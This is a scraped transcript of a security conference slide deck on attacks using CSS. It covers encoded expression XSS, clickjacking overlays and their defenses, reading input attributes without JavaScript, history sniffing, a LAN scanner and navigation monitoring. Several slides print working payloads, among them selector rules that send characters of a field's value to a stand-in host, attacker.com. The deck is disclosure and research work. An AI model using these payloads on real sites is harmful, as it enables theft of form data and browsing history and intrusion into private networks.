Presentation is loading. Please wait.

Presentation is loading. Please wait.

The Sexy Assassin Tactical Exploitation using CSS.

Similar presentations


Presentation on theme: "The Sexy Assassin Tactical Exploitation using CSS."— Presentation transcript:

1 The Sexy Assassin Tactical Exploitation using CSS

2 CSS Presentation Overview Old Attacks New Research New Attacks

3 Old Attacks - reloaded Known attacks using CSS

4 XSS using CSS - Impact Session riding/hijacking attack Steal page data content Exploit BoF/HoF/Memory Corruption/etc. vulnerabilities All other XSS threads

5 Expression XSS CSS values can be escaped with backslashes Then further encoded with hex/decimal entities Following the CSS specification you can encode expressions with hex escapes


6 Expression XSS continued We can also entity encode the previous vector


7 External style sheet tricks Expressions can be executed in external style sheets We can encode the vector We can also encode the content Importing expressions from a XSS file @\69\6d\70\6f\72\74 'xss.css'; How can we encode the content of a style sheet? @import 'utf.css';

8 UTF-7 Expression UTF-7 encoded style sheet @charset "UTF-7"; +ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcw BpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0- Which produces: * {xss:expression(alert(1))}

9 CSS Overlays (clickjacking) CSS Overlays (clickjacking) Definition: Convincing the user to click something, and use that click to do something else (bad things)

10 Click here to continue Attacker page CSS Overlays description Original WebPage (iframe) Button _____________________________ _____________ _____________________________ _______________ ______________ _______________ ______________ _______________ ______________

11 CSS Overlays advanced attacks Multiple iframes nested Using offsets to gather a piece of a target site No opacity, filled white div regions Single sign on services vulnerable Combined Javascript and CSS tricks to intercept a click, impossible to know until it's too late

12 CSS Overlays advanced attacks Verisign case study iframe performs a login request on site (ficlets.com)

ficlets.com connects to Verisign provider

13 CSS Overlays advanced attacks Verisign case study cont. OpenID provider (Verisign) is now in our iframe

14 CSS Overlays advanced attacks Verisign case study cont. Using multiple iframes and div offsets we can cover the other areas with solid colours and position the target area wherever we like

15 CSS Overlays advanced attacks Verisign case study cont. Opacity can be used but solid fills make the attack harder to protect against at the browser level Referer checking can neuter attack but not always available and no implemented on most sites Referer can be faked David Ross idea to use a "clickjacket", accessible style sheet which uses expressions to display a hover popup which appears above other elements.

16 CSS Overlays Work Arrounds Someone -> iframe-breaker In some browsers (IE) JS can be disabled (iframe- breaker-breaker) NoScript -> Opacity disabled on remote iframes and embed content. CSS overlays that don't require Opacity still work. Michal Zalewski -> click if not obstructed Still works against some no-opacity overlays attacks. Mozilla -> Delayed disabled-buttons. Still exploitable David Ross -> X-I-Don't-Wanna-Be-Iframed-Please Old browsers and websites still vulnerable.

17 Exploiting clickjacking defenses iframe hover state can be intercepted No way to tell if you're hovering over an external site Clicks can then be transferred to the iframe when a user clicks

18 Exploiting clickjacking defenses Image intercepts the hover state Image is hidden onmousedown The click is transferred to the iframe because the mousedown state is used, onmouseup we're in the iframe

19 More clickjacking defenses My extension to David Ross' click jacket Full metal click jacket CSS accessible style sheet is used to override browser defaults with !important. iframe,frame,object,applet { border:1px solid #000 !important; visibility:visible !important; opacity: 1 !important; filter: alpha(opacity=100) !important; position:absolute !important; float:none !important; overflow:auto !important;.... }

20 More clickjacking defenses Advantages: Object styles are locked User can see clearly that it is a external site Javascript and CSS modification of styles have no effect Disadvantages: Manuel Caballero hacked it :) Parent element allows opacity modification

21 More clickjacking defenses Browser level CSS locks could prevent attacks Advantages: Hard for attacker to exploit if external objects are clearly visible and above everything else Disadvantages: Designers would complain about limiting design ideas External objects would look ugly Could break existing sites

22 New Research Algorithms

23 Arithmetics & Memory - Check out Demos on http://p42.us/csshttp://p42.us/css How: element:condition{ action; } element: anything condition: :visited, :active, :hover, :selected, etc.. action: background(remote request), display, opacity, visibility.

24 Loops - Check out Demos on http://p42.us/csshttp://p42.us/css Recalc of style: - META refreshes - -moz-binding *{-moz-binding:url(“remote-req#id”)} - webkit proposed CSS based animations (not very useful) @keyframes{}

25 Server Side Interaction - Check out Demos on http://p42.us/csshttp://p42.us/css Use HTML+XML data loading (just IE or just FFx) MSIE HTC files, XML DATAFLD moz-binding Metarefreshes + Stylesheet update (it’s not cross-browser) Async stylesheet loading (doesn’t work on strict mode) @import”//url1”; @import”//url2”; Multiple iframe loading (works everywere)

26 New attacks Attacks possible thanks to the "theory"

27 CSS HTML Attribute Reader CSS HTML Attribute Reader How to read HTML Attributes using CSS, without javascript.

28 CSS HTML Attribute Reader Advanced CSS3 Attribute Selectors: For matching: input{} – Matches all inputs. input[type]{} – Matches all inputs with an attribute “type”. input[type=“password”]{} – Matches all inputs of type “password”.

29 CSS HTML Attribute Reader Advanced CSS3 Attribute Selectors: For matching: input[type*=“swor”]{} – Matches all input elements whose type attribute contains “swor” (anywhere) input[type^=“pass”]{} – Matches all inputs whose type attribute starts with “pass” input[type$=“word”]{} – Matches all inputs whose type attribute ends with “word”

30 CSS HTML Attribute Reader Attempts to read an attribute with [=] selector with help of the [*=] selector! Calculate the range of the chars in the value. input[value*=“\x10”]{ background:url(“//attacker.com/?h=\x10”); } … 111 different variations … input[value*=“\x7F”]{ background:url(“//attacker.com/?h=\x7F”); }

31 To calculate the first letter if we asume from the previews step that the range is [uiopasdf] input[value^=“u”]{ background:url(“//attacker.com/?s=u”); } … and so, 8 questions... u,i,o,p,a,s,d,f … input[value^=“f”]{ background:url(“//attacker.com/?s=f”); } CSS HTML Attribute Reader – Try 3

32 Once we found the first char (let’s say it was d) we continue with [uiopasf] : input[value^=“du”]{ background:url(“//attacker.com/?s=du”); } … and so, 7 questions... u,i,o,p,a,s,,f … input[value^=“df”]{ background:url(“//attacker.com/?s=df”); } CSS HTML Attribute Reader – Try 3

33 And so on. If we assume known attribute length, but allow for repeats… 111+N^2 CSS rules In the worst case for 8 chars: 175 CSS rules In the worst case for 50 chars: 2,611 CSS rules CSS HTML Attribute Reader – Try 3

34 CSS HTML Attribute Reader We can optimize this more, but at an implementation level. First, we can use [^=] and [$=] selectors at the same time halving the number of requests.

35 CSS HTML Attribute Reader Detect the range Detect first char and eigthth char Detect second char and seventh char Detect third char and sixth char Detect fourth char and fifth char Confirm we have the correct string 123 456

36 CSS HTML Attribute Reader Demo: - Async stylesheet load attribute reader (read the contents of a text field without js)Async stylesheet load attribute reader (read the contents of a text field without js) http://eaea.sirdarckcat.net/cssar/ Parallel discovery by Stefano Di Paola (WiSec) with 111*N complexity (888 rules for 8 chars) http://www.wisec.it/

37 -1day (0Day-1) - Cross Site Styling HTML5 Describes seamless iframes. So HTML Attribute reading would be a vulnerability in a non- implemented standard! These will inherit all styles of the parent document (cross origin). CSS will read content cross-origin! Call for Microsoft's guys in the W3C HTML5 WG: Stop this! make it same-origin only ;) @import”exploit”;

38 CSS History Hacks Attacks based on the possibility of CSS of reading a browser's History.

39 Visited boolean Cross-browser a:visited{background:url(//visited)} a:not(:visited){background:url(//not-visited)} Impact Privacy Counter-measures Firefox: SafeHistory addon IE: Disable history Demo: http://ha.ckers.org/weird/CSS-history.cgihttp://ha.ckers.org/weird/CSS-history.cgi

40 CSS LAN Scanner PoC: CSS LAN ScannerCSS LAN How it works: Error pages don't create a log in the history. If a website is valid, then it is marked as visited. The scanner just visits a lot of LAN IPs, and checks if they were marked as visited.

41 CSS LAN Scanner LAN intranet attacker.com victim 10.3.22.111 Private webservice 192.168.1.254 Configuration router Victim visits attacker.com.

42 CSS LAN Scanner LAN intranet attacker.com victim 10.3.22.111 Private webservice 192.168.1.254 Configuration router attacker.com tries to open a lot of local ip addresses on iframes, most will fail.

43 CSS LAN Scanner LAN intranet attacker.com victim 10.3.22.111 Private webservice 192.168.1.254 Configuration router attacker.com then asks which websites appear as visited, and so, those IPs are up.

44 CSS LAN Scanner LAN intranet attacker.com victim 10.3.22.111 Private webservice 192.168.1.254 Configuration router The victim responds attacker with the visited IPs.

45 CSS LAN Scanner LAN intranet attacker.com victim 10.3.22.111 Private webservice 192.168.1.254 Configuration router attacker.com then tries to guess the service on those IPs based on ports, and if necessary, the content of remote Stylesheets

46 CSS LAN Scanner LAN intranet attacker.com victim 10.3.22.111 Private webservice 192.168.1.254 Configuration router attacker.com then sends CSRF attacks against the detected software behind the LANs.

47 CSSH - CSS Stealing Some History CSSH - CSS Stealing Some History History Crawler + Navigation Monitoring!

48 CSSH - History Crawler attacker.com digg.com twitter.com slashdot.org hi5.com myspace google news msn.com del.icio.us live.com sla.ckers.org Redtube facebook attacker.com shows a lot of possible websites that the user may have visited. Victim

49 CSSH - History Crawler attacker.com digg.com twitter.com slashdot.org hi5.com myspace google news msn.com del.icio.us live.com sla.ckers.org Redtube facebook The victim responds the attacker with the websites visited. Victim

50 CSSH - History Crawler attacker.com Link #1 Link #2 Link #3 Link #4 Link #5 Link #6 Attacker fetches the links of those websites, and asks which ones are visited. The victim responds, and the exploit asks again endlessly. Victim

51 CSSH - History Crawler This way we can effectivelly crawl commonly visited websites of a user. The privacy implications of this are huge. This attack is not a secret, it was described in Mozilla’s bugtrack by Paul Stone: https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78

52 CSSH - Navigation Monitoring What if... We could detect in real-time the navigation of a user using our history crawler? Might this be possible? Yes

53 CSSH - Navigation Monitoring Victim Attacker  Victim visits attacker.com

54 CSSH - Navigation Monitoring Victim Attacker  digg.com attacker.com sends exploit to user, and opens digg.com.

55 CSSH - Navigation Monitoring Victim Attacker  The exploit detects that digg.com was visited, so it alerts attacker.com, and attacker.com fetches the links on digg.com. digg.com

56 CSSH - Navigation Monitoring Victim Attacker  Then, the attacker updates the exploit, and start asking for each link if anyone of them are visited. digg.com

57 CSSH - Navigation Monitoring Victim Attacker  When the user finally clicks on a link, the exploit detects it, and alert’s attacker.com digg.comcnn.com

58 CSSH - Navigation Monitoring Victim Attacker  attacker.com fetches all links on cnn.com, and updates the exploit asking wether they where visited. digg.comcnn.com

59 CSSH - Navigation Monitoring Victim Attacker  Repeat above steps indefinitely. digg.comcnn.com

60 CSSH - Navigation Monitoring Public Demo : http://eaea.sirdarckcat.net/cssh-mon/ Cross-browser.

61 Thanks We would like to thank: Bluehat team, David Ross, Robert Hansen, Jeremiah Grossman, Giorgio Maone, Alex K, David Lenoe (Adobe PSIRT), Google Sec. Team, Stefano DiPaola, and everyone else that asisted in any way our research.


Download ppt "The Sexy Assassin Tactical Exploitation using CSS."

Similar presentations


Ads by Google